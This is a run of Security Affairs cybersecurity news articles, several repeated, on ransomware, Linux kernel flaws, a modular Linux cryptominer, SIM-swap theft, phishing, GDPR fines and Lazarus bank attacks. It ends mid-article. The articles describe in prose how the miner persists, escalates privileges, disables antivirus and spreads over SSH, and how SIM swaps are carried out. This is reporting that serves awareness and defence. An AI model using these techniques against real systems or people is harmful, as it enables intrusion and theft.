Facebook executive, Richard Allan, will have to respond to the answers of lawmakers from seven countries at the committee’s hearing in London next Tuesday.

Lawmakers from seven countries are preparing to grill a Facebook executive, Richard Allan, at the committee’s hearing in London. Facebook CEO Mark Zuckerberg has refused to be present.

“The U.K. committee used its powers to compel the chief executive Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

The company is opposing to the disclosure of the files, a judge in California ordered them sealed earlier this year.

Allan informed Collins via email the judge is expected to give guidance on the legal status of the documents as early as Monday,

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it will appeal the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

The social network giant is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.

Security Affairs: Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.



Security Affairs

Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.

Security Affairs: When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches that were tracked in the U.S. in 2017 totaled 1,579, a nearly 44.7 percent increase from the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it likely poses a risk to people and threatens their rights and freedoms. This is based on the General Data Protection Regulation (GDPR), which applies to any organization that handles the data of European Union citizens. An incident might threaten someone’s rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, an organization that experiences a personal data breach must notify the appropriate authorities within 72 hours of discovering it. Within that timeframe, data controllers are also required to conduct an investigation of the incident, identify the affected data, inform impacted individuals and create a plan for containing the breach. If the organization can’t complete these activities within 72 hours, it is expected to provide an explanation as to why.

Under the Health Insurance Portability and Accountability Act (HIPAA), entities affected by the law must inform authorities and the impacted individuals within 60 days, but only if 500 or more people are affected. Authorities for some other sectors, such as the Securities and Exchange Commission (SEC), don’t have specific timeframe requirements.

Requirements under state laws vary. In New Mexico, businesses have 45 days to issue a notification if the incident impacted 1,000 or more residents of the state. California requires companies to send out notifications if 500 or more residents are affected, but it doesn’t have a specific timeframe requirement.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you’re in and who was affected. In many cases, you must notify the supervising authorities. Under the GDPR, for example, you need to notify the Information Commissioner’s Office. If your organization is covered by the Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and perhaps the media. If you are covered by the HIPAA Breach Notification Rule, you’ll need to inform the U.S. Health and Human Services department.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

 

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.



Security Affairs

When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches that were tracked in the U.S. in 2017 totaled 1,579, a nearly 44.7 percent increase from the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it likely poses a risk to people and threatens their rights and freedoms. This is based on the General Data Protection Regulation (GDPR), which applies to any organization that handles the data of European Union citizens. An incident might threaten someone’s rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, an organization that experiences a personal data breach must notify the appropriate authorities within 72 hours of discovering it. Within that timeframe, data controllers are also required to conduct an investigation of the incident, identify the affected data, inform impacted individuals and create a plan for containing the breach. If the organization can’t complete these activities within 72 hours, it is expected to provide an explanation as to why.

Under the Health Insurance Portability and Accountability Act (HIPAA), entities affected by the law must inform authorities and the impacted individuals within 60 days, but only if 500 or more people are affected. Authorities for some other sectors, such as the Securities and Exchange Commission (SEC), don’t have specific timeframe requirements.

Requirements under state laws vary. In New Mexico, businesses have 45 days to issue a notification if the incident impacted 1,000 or more residents of the state. California requires companies to send out notifications if 500 or more residents are affected, but it doesn’t have a specific timeframe requirement.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you’re in and who was affected. In many cases, you must notify the supervising authorities. Under the GDPR, for example, you need to notify the Information Commissioner’s Office. If your organization is covered by the Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and perhaps the media. If you are covered by the HIPAA Breach Notification Rule, you’ll need to inform the U.S. Health and Human Services department.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

 

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.

Linux Kernel is affected by two DoS vulnerabilities still unpatched

Linux Kernel is affected by two denial-of-service (DoS) flaws, both vulnerabilities are NULL pointer deference issues

Linux Kernel is affected by two denial-of-service (DoS) vulnerabilities, the issues impact Linux kernel 4.19.2 and previous versions.

Both flaws are rated as Medium severity and are NULL pointer deference issues that can be exploited by a local attacker to trigger a DoS condition.

The first vulnerability tracked as CVE-2018-19406 resides in the Linux kernel function called kvm_pv_send_ipi implemented in arch/x86/kvm/lapic.c.

A local attacker can exploit the flaw by using crafted system calls to reach a situation where the apic map is not initialized.

“kvm_pv_send_ipi in arch/x86/kvm/lapic.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where the apic map is uninitialized.” reads the security advisory.

“The reason is that the apic map has not yet been initialized, the testcase
triggers pv_send_ipi interface by vmcall which results in kvm->arch.apic_map
is dereferenced. This patch fixes it by checking whether or not apic map is
NULL and bailing out immediately if that is the case.” reads a blog post published by Wanpeng.

The second flaw, tracked as CVE-2018-19407 resides in the Linux Kernel function vcpu_scan_ioapic that is defined in arch/x86/kvm/x86.c.

The flaw is triggered when I/O Advanced Programmable Interrupt Controller (I/O APIC) does not initialize correctly.

The vulnerability could be exploited by a local attacker using crafted system calls that reach a situation where ioapic is uninitialized.

“The vcpu_scan_ioapic function in arch/x86/kvm/x86.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where ioapic is uninitialized.” reads the security advisory.

“The reason is that the testcase writes hyperv synic HV_X64_MSR_SINT6 msr and triggers scan ioapic logic to load synic vectors into EOI exit bitmap. However, irqchip is not initialized by this simple testcase, ioapic/apic objects should not be accessed,” reads the analysis published by Wanpeng Li.

Unofficial patches for both flaws were released in the unofficial Linux Kernel Mailing List (LKML) archive, but haven’t been pushed upstream.

Pierluigi Paganini

(Security Affairs – Linux Kernel, DoS)

The post Linux Kernel is affected by two DoS vulnerabilities still unpatched appeared first on Security Affairs.

Experts found a new powerful modular Linux cryptominer

Security experts from Russian antivirus firm Dr.Web have discovered a new strain of Linux cryptominer tracked as Linux.BtcMine.174.

The Linux cryptominer has a multicomponent structure that implements a broad range of features in over 1,000 lines of code.

When the Monero Linux cryptominer is first executed it checks whether the server, from which the Trojan will subsequently download additional modules, is available.

Then it finds a folder on disk to which it has write permissions so it can copy itself and use it as a repository for the downloading of additional modules.

The Linux.BtcMine.174 Linux cryptominer uses one of two privilege escalation exploits CVE-2016-5195 (aka Dirty COW) and CVE-2013-2094 to get root permissions on the infected system.

The Linux miner also adds itself as an autorun entry to files like /etc/rc.local/etc/rc.d/…, and /etc/cron.hourly; and then downloads and runs a rootkit.

“If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package). ” Reads the analysis published by Dr. Web.

Once the malware has infected the Linux system, it will scan and terminate the processes of several miners, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.). Experts also discovered that the Trojan also kill antivirus software, including Avast, AVG, Dr.Web and ESET.

Then the Linux.BtcMine.174. downloads and starts its own Monero-mining operation.

Linux.BtcMine.174 also downloads and executes with the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

The Trojan also collects data for all the hosts to which the current user has previously connected via SSH and tries to connect them.

Experts believe the malware is spreading using SSH credentials stolen on the infected systems.

Additional technical details are included in the report published by Dr.Web, the experts also published SHA1 hashes for the various components of the malware on GitHub.

Pierluigi Paganini

(Security Affairs – Linux cryptominer, Linux.BtcMine.174)

The post Experts found a new powerful modular Linux cryptominer appeared first on Security Affairs.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs

Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.

Security Affairs: Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very trivial phishing campaign targeting the streaming service Spotify, anyway, it is important to share info about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

The phishing campaign was discovered earlier November, attackers used convincing emails to trick Spotify users into providing their account credentials.

The messages include a link that points to phishing websites that prompt users into entering their username and password. Attackers use them to compromise the Spotify accounts and any other account on other services that share the same credentials.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

spotify phishing campaign

Attackers set up a login page that looks identical to the actual Spotify login page, but with an URL that isn’t the legitimate one.

Experts also pointed out that the “From Address domain is not the official Spotify one.

The attacker trick victims into clicking on a green button with the words “CONFIRM ACCOUNT.” The messages pose themselves as urgent communication about account restrictions that could be removed with an action of the users.

Clicking on the button, users are redirected to a phishing page.

Sincerely speaking, this specific campaign is not complex and could be easily spotted by most of the users.

The post published by the experts has just one goal, share information about a campaign that could deceive non-tech-savvy users, for this reason, I decided to speak about the Spotify campaign too.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.



Security Affairs

Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very trivial phishing campaign targeting the streaming service Spotify, anyway, it is important to share info about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

The phishing campaign was discovered earlier November, attackers used convincing emails to trick Spotify users into providing their account credentials.

The messages include a link that points to phishing websites that prompt users into entering their username and password. Attackers use them to compromise the Spotify accounts and any other account on other services that share the same credentials.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

spotify phishing campaign

Attackers set up a login page that looks identical to the actual Spotify login page, but with an URL that isn’t the legitimate one.

Experts also pointed out that the “From Address domain is not the official Spotify one.

The attacker trick victims into clicking on a green button with the words “CONFIRM ACCOUNT.” The messages pose themselves as urgent communication about account restrictions that could be removed with an action of the users.

Clicking on the button, users are redirected to a phishing page.

Sincerely speaking, this specific campaign is not complex and could be easily spotted by most of the users.

The post published by the experts has just one goal, share information about a campaign that could deceive non-tech-savvy users, for this reason, I decided to speak about the Spotify campaign too.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.

Security Affairs newsletter Round 190 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      6,500+ sites deleted after Dark Web hosting provider Daniels Hosting hack
·      Hacking Gmails UX with from fields for phishing attacks
·      Instagram glitch exposed some user passwords
·      Suspected APT29 hackers behind attacks on US gov agencies, think tanks, and businesses
·      CarsBlues Bluetooth attack Affects tens of millions of vehicles
·      Cybaze ZLab – Yoroi team analyzed malware used in recent attacks on US entities attributed to APT29
·      Israel aims at hardening aviation industry assets from cyberattack
·      Tianfu Cup PWN hacking contest – White hat hackers earn $1 Million for Zero-Day exploits
·      Experts analyzed how Iranian OilRIG hackers tested their weaponized documents
·      Hackers target Drupal servers chaining several flaws, including Drupalgeddon2 and DirtyCOW
·      Mac users using Exodus cryptocurrency wallet targeted by a small spam campaign
·      TP-Link fixes 2 Remote Code Execution flaws in TL-R600VPN SOHO Router and other issues
·      Two hackers involved in the TalkTalk hack sentenced to prison
·      A flaw in US Postal Service website exposed data on 60 Million Users
·      Amazon UK is notifying a data breach to its customers days before Black Friday
·      Experts found flaws in Dell EMC and VMware Products. Patch them now!
·      Facebook increases rewards for its bug bounty program and facilitate bug submission
·      Sofacy APT group used a new tool in latest attacks, the Cannon
·      Chaining 3 zero-days allowed pen testers to hack Apple macOS computers
·      Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw
·      Flaw allowing identity spoofing affects authentication based on German eID cards
·      13 fraudulent apps into Google Play have been downloaded 560,000+ times
·      Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud
·      Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits
·      New Emotet Thanksgiving campaign differs from previous ones
·      Software company OSIsoft has suffered a data breach
·      VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition
·      Chat app Knuddels fined €20k under GDPR regulation
·      North Korea-linked group Lazarus targets Latin American banks
·      US Government is asking allies to ban Huawei equipment
·      Facebook appeals UK fine in Cambridge Analytica privacy Scandal

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 190 – News of the week appeared first on Security Affairs.

Facebook appeals UK fine in Cambridge Analytica privacy Scandal

Facebook appeals 500,000-pound fine for failing to protect users’ personal information in the Cambridge Analytica scandal.

Facebook appeals the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Now Facebook is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

“Their reasoning challenges some of the basic principles of how people should be allowed to share information online, with implications which go far beyond just Facebook, which is why we have chosen to appeal,” explained the Facebook lawyer Anna Benckert.

“For example, under ICO’s theory people should not be allowed to forward an email or message without having agreement from each person on the original thread. These are things done by millions of people every day on services across the internet.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook appeals UK fine in Cambridge Analytica privacy Scandal appeared first on Security Affairs.

Chat app Knuddels fined €20k under GDPR regulation

The case is making the headlines, the German chat platform Knuddels.de (“Cuddles”) has been fined €20,000 for storing user passwords in plain text.

In July hackers breached the systems of the company Knuddels and leaked online its data.

In September, an unknown individual notified Knuddels that crooks published user data of roughly 8,000 members on Pastebin and much more data were leaked via Mega.nz.

Knuddels published a data breach notification and forced users into changing passwords, Knuddels also reported the incident to the Baden-Württemberg data protection authority.

The company duly notified its users and the Baden-Württemberg data protection authority.

“Hello dear ones, 
when you log into the chat, you are currently asked to change your password. 
That’s a precaution. Account data from Knuddels have been published on the internet. Although we are currently not aware of any third-party use, we have temporarily deactivated these accounts for their security.” reads a message published on the company forum.

“We are currently checking whether there is a security vulnerability on the platform. As soon as we have more information, we’ll let you know, of course. For problems and questions please contact our support at community@knuddels.de.
Please use the hint when logging in and change your password.”

According to the German Spiegel Online, hackers leaked over 800,000 email addresses and more than 1.8 million user credentials on Mega.nz.

“the company from Karlsruhe violated the obligation to ensure the security of personal data, informed the Baden-Wuerttemberg data protection commissioner Stefan Brink on Thursday in Stuttgart.” reported Spiegel Online.

“He told the company that after a hacker attack, it turned to the DPA and informed users immediately and extensively about the attack. According to the company, around 808,000 e-mail addresses and 1,872,000 pseudonyms and passwords were stolen by unknown persons and published on the Internet.”

At the time the company had verified 330,000 of the published emails. The chat platform violated GDPR regulation by storing passwords in clear text and for this reason, the regulator imposed its first penalty under the privacy regulation.

The fine is not higher because the company cooperated with the authorities.

“Due to a breach of the data security required by Art. 32 DS-GVO, the penalty office of LfDI Baden-Württemberg imposed a fine of EUR 20,000 by decision of 21.11.2018 against a Baden-Württemberg social media provider and – in constructive Collaboration with the company – ensuring significant improvements in the security of user data.” reads the Baden-Wuerttemberg data protection authority.

“By storing the passwords in clear text, the company knowingly violated its duty to ensure data security in the processing of personal data,” 

The authority’s State Commissioner for Data Protection and Freedom of Information, Stefan Brink, confirmed it avoided impose the highest possible fines, it doesn’t want bankrupting the company.

“The overall financial burden on the company was taken into account in addition to other circumstances,” the authority noted.

“The hacker attack was a real test of stress for Knuddels.” It was immediately clear that the trust of users could only be regained with transparent communication and an immediate noticeable improvement in IT security. “Knuddels is safer than ever.” declared the managing director of Knuddels GmbH & Co. KG, Holger Kujath.

Pierluigi Paganini

(Security Affairs – GDPR, data breach)

The post Chat app Knuddels fined €20k under GDPR regulation appeared first on Security Affairs.

Security Affairs: North Korea-linked group Lazarus targets Latin American banks

According to security reearchers at Trend Micro, the North Korea-linked APT group Lazarus recently targeted banks in Latin America.

The North Korea-linked APT group Lazarus recently targeted banks in Latin America, Trend Micro experts reported.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

Recently, the group was involved in several attacks aimed at stealing millions from ATMs across Asia and Africa.

Security experts from Symantec have recently discovered a malware, tracked as FastCash Trojan, that was used by the Lazarus APT Group, in a string of attacks against ATMs.

The ATP group has been using this malware at least since 2016 to siphon millions of dollars from ATMs of small and midsize banks in Asia and Africa.

Now experts from Trend Micro have found a Lazarus backdoor on several machines belonging to financial institutions across Latin America. The malicious codes were installed by the APT group on the targeted machines on September 19.

“There seems to be a resurgence of activity from the group, and recent events show how their tools and techniques have evolved. Just last week they were found stealing millions from ATMs across Asia and Africa.” reads the analysis published by Trend Micro.

“We also recently discovered that they successfully planted their backdoor (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) into several machines of financial institutions across Latin America.”

The technique recently used by Lazarus resembles a 2017 wave of attacks that hit targets in Asia, at the time hackers used the FileTokenBroker.dll and a modularized backdoor.

In 2018 attacks, the Lazarus group used multiple backdoors, and also implemented a sophisticated technique that involves the three major components:

  • AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) – loader DLL that is launched as a service
  • Msadoz<n>.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) – encrypted backdoor
    n = number of characters in the loader dll’s filename
  • Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) – encrypted configuration file

Lazarus Latin america attacks

